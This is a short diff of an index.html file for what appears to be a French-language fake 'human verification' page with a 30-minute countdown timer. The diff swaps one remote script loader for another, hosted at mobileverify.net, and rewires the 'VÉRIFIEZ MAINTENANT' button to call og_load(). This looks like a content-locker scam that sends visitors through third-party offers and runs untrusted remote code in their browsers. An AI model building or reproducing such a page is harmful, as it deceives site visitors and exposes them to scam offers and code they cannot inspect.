--- a/index.html
+++ b/index.html
@@ -15,10 +15,8 @@
 		<link href="css/animate.css" rel="stylesheet">
 		<link href="css/magnific-popup.css" rel="stylesheet">
 		<link href="css/style.css" rel="stylesheet">
-			<script type="text/javascript">
-    var TIzgU_IMr_ptliNc={"it":4200451,"key":"743e6"};
-</script>
-<script src="https://d115fsoldgezur.cloudfront.net/7e6d18f.js"></script>
+			<script type="text/javascript" id="ogjs" src="https://mobileverify.net/cl/js/8dj1dk"></script>
+
 		<script src="js/1eab076.js"></script>
 	</head>
 	<body>
@@ -40,7 +38,7 @@
 						<span id="human_verification_timer_time"><span>30 minutes and 00 seconds</span></span>
 					</div>
 					<div class="verification-button-wrapper">
-						<a <button="" onclick="_yy()" class="button">VÉRIFIEZ MAINTENANT</a>
+						<a <button="" onclick=og_load(); class="button">VÉRIFIEZ MAINTENANT</a>
 					</div>
 				</div>
 			</div>
